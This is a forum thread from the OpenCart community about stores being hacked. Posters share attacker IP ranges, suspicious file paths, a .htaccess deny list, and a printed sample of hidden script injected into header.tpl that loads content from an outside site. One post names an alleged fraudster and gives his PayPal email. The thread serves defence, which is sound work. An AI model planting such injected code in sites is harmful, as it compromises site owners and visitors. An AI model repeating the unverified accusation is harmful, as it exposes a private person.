Common IPs used by the hackers:
1.55.210.180
1.54.*.*
113.190.139.39
US Proxy Servers
Files to look out for in your system:
system/helper/helper.php
download/ (yourfilenames[dot]random_characters[dot]php_random_characters
modified trojan infected index.html in download folder
download/cp.php
Range of IP recommended to block as they switch between those IPs in Vietnam:
113.22.0.0/16
113.23.0.0/17
113.52.32.0/19
113.61.108.0/22
113.160.0.0/11
1.52.0.0/14
Anyway, the 113.x.x.x range commits a lot of frauds recently.
They also attempts to create an admin user account in the system.
This so others can block them if they're not selling in that area.
Thanks for posting btw.
Norman in 't Veldt
Moderator OpenCart Forums
_________________ READ and Search BEFORE POSTING _________________
Our FREE search: Find your answer FAST!.
[How to] BTW + Verzend + betaal setup.
If they've used the same tool as they have to hack mine, you might also want to clear your /tmp directory as they have placed key files in mine to allow themselves ssh access.
Wedding Invitations and Stationery by Love2print
Commercial Mods
Product Colours on Category Page
Cardsave Direct Gateway
Clear Cache
Promotional Watermarks on Images
Multiple Category / Product Templates ** Popular **
Log Failed Login Attempts
Display Eligible Coupons with Products
Twitter Feeds
Have I helped you out or saved you some time? Please donate
I move that topic to the Moderators forum to have it analyzed.JoseManuel wrote:Watch this topic open.http://forum.opencart.com/viewtopic.php?f=10&t=91623
The IPs and nationality of the attacks seen by me are not real.
Norman in 't Veldt
Moderator OpenCart Forums
_________________ READ and Search BEFORE POSTING _________________
Our FREE search: Find your answer FAST!.
[How to] BTW + Verzend + betaal setup.
and for developers giving admin access to people to show their mods have to disable access to download tab via admin permission feature
is this all or i am missing something.....
A coder by Hobby and Developer by Profession
Images in Manufacture
http://www.opencart.com/index.php?route ... on_id=6943
Description and images in Manufacture
http://www.opencart.com/index.php?route ... on_id=6978
http://codertj.com
The bad things about these hackers, they always forget to clear their footprints after they are done. And the bad things about us, we always don't take enough precaution. Best practice is to comment out the block of PHP codes that does uploading. Removing the javascript isn't enough. Or just change the folder's permission
order allow,denyi2Paq wrote:How would one go about blocking these via .htaccess?
This so others can block them if they're not selling in that area.
Thanks for posting btw.
allow from all
deny from 88.131.106.0/24
deny from 180.76.5.0/24 # Baidu Spider
deny from 220.181.108.0/24 # Baidu
deny from 208.83.156.0/24
deny from 113.22.0.0/16
deny from 113.23.0.0/17
deny from 113.52.32.0/19
deny from 113.61.108.0/22
deny from 113.160.0.0/11
deny from 1.52.0.0/14
https://www.lotnllc.com is your one stop shop for all your computer needs!
and yesterday I got someone from vietnam trying to steal my product by purchasing it with very low price, the product price is $19.95 but he only pay $0.01 to my paypal, I don't know how he can do it, fortunately the order status is pending so (maybe) he can't download the files.
is there anyone knows which system files that possible to be hacked that causing I can not login to admin?
every one becarefull with this IP :
113.166.96.13
123.21.178.196
93.139.33.141
and becarefull with this name (he register as Andrea Pots but I got his name in paypal payment detail) :
Minh Phuc Duong
paypal address: phucduongqb@zing.vn
the code injected/inserted in notification div id in header.tpl file, so theme maker please check also your demo links files, maybe it also happen to you, but I hope not.
here is the code that has been injected:
<style>#getcms,.h1en{width:1px; height:1px; position:absolute; overflow:hidden;}</style>
<h1 class="h1en"><a href="http://cartcms.net" title="Cart CMS - Free Shopping Cart CMS" rel="dofollow">Cart CMS - Free Shopping Cart CSM</a>
<div id="getcms"></div></h1>
<script type="text/javascript"><!--
$(document).ready(function() {
$('#getcms').load('http://cartcms.net');
});
//--></script>
Users browsing this forum: Anthony101990Jones and 91 guests